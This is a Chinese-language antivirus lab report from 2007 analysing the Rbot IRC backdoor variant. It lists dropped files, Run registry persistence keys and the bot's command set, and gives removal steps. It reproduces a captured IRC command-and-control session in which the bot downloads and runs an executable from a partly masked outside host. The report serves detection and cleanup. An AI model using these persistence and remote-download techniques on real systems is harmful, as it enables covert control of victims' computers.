安全响应·Security
病毒分析报告·Report

Backdoor.Win32.Rbot.bjp分析

出处:安天实验室 时间:2007-07-20 10:00

病毒标签:

病毒名称: Backdoor.Win32.Rbot.bjp
中文名称: IRC机器人变种
病毒类型: 后门类
文件 MD5: 5022311D3F95A475C11C03B0DB22B007
公开范围: 完全公开
危害等级: 较大
文件长度: 脱壳前75,855字节,脱壳后518,656 字节
感染系统: Win9X以上系统
开发工具: Microsoft Visual C++ 6.0
加壳工具: 未知壳
病毒描述:

  该病毒运行后,衍生病毒文件到系统目录下,添加注册表自动运行项以跟随系统引导病毒体。病毒体按接收IRC指令下载病毒体,病毒体可能为任意恶意程序,受感染用户可能被操控进行各种恶意操作。病毒本身具有创建FTP、TFTP、地址端口扫描、响应IRC命令操作、枚举网络弱口令等功能。由于病毒自身会检测执行条件,一般情况下不会有明显的病毒行为,因此具有较强的隐匿性。
行为分析:

1 、衍生下列副本与文件:

    %WINDOWS%\System32\svcchost.exe
    %Documents and Settings%\当前用户名\Local Settings\Temp\fdsf.exe
        
2 、新建注册表键值:

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msvcc25
    Value: String: "svcchost.exe "
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
    RunServices\msvcc25
    Value: String: "svcchost.exe "
    
3 、连接网络下载病毒体:

    // 连接 IRC 服务器,接收下载指令,服务器地址 :66.109.25.***:11640
    NICK CHN|355814
    USER fjbwnju 0 0 :CHN|355814
    :NaNu 001 CHN|355814 :MySQL CHN|355814!~fjbwnju@222.171.7.***
    :NaNu 376 CHN|355814 :
    :CHN|355814 MODE CHN|355814 :+i
    USERHOST CHN|355814
    :NaNu 302 CHN|355814 :CHN|355814=+~fjbwnju@222.171.7.***
    MODE CHN|355814 +x+i
    JOIN ##salvage,##salvage2 he 爃 e
    :CHN|355814!~fjbwnju@222.171.7.*** JOIN :##salvage :
    NaNu 332 CHN|355814 ##salvage :
    . 燿 http://72.20.4.***:1182/4.exe fdsf.exe 1
    :NaNu 333 CHN|355814 ##salvage 10:30 PM 1184798286
    :NaNu 366 CHN|355814 ##salvage :End of /NAMES list.
    :CHN|355814!~fjbwnju@222.171.7.*** JOIN :##salvage2
    :NaNu 366 CHN|355814 ##salvage2 :End of /NAMES list.
    PRIVMSG ##salvage :[DOWNLOAD]: Downloading URL:
    http://72.20.4.***:1182/4.exe to: fdsf.exe.// 下载地址
    PRIVMSG ##salvage :[DOWNLOAD]: Downloaded 70.7 KB to fdsf.exe @ 8.8 KB/sec.
    PRIVMSG ##salvage :[DOWNLOAD]: Opened: fdsf.exe.     

4 、响应的IRC命令包括下列:

    ping
    pong
    join
    userhost
    host
    nick
    kick
    part
    quit
    notice
    rn
    logout
    clone
    clonestop
    scan
    scanstop
    reconnect
    disconnect
    sysinfo
    killthread
    open
    upload
    reboot
    download
        
注: %System% 是一个可变路径。病毒通过查询操作系统来决定当前 System 文件夹的位置。Windows2000/NT 中默认的安装路径是 C:\Winnt\System32 , windows95/98/me 中默认的
安装路径是 C:\Windows\System , windowsXP 中默认的安装路径是 C:\Windows\System32 。
清除方案:
 

1 、 使用安天木马防线可彻底清除此病毒 ( 推荐 )

2 、 手工清除请按照行为分析删除对应文件,恢复相关系统设置。
    (1) 使用 安天木马防线结束下列进程:
       svcchost.exe
    (2)恢复病毒修改的注册表项目,删除病毒添加的注册表项:
      HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
      Windows\CurrentVersion\Run\msvcc25
      Value: String: " 病毒文件名 .exe"
      HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
      Windows\CurrentVersion\RunServices\msvcc25
      Value: String: " 病毒文件名 .exe"
    (3) 删除病毒释放文件:
      %WINDOWS%\System32\svcchost.exe
      %Documents and Settings%\ 当前用户名 \
      Local Settings\Temp\fdsf.exe

附:
 


点击此处下载木马防线2005+

病毒上报信箱: submit@virusview.net
[TOP]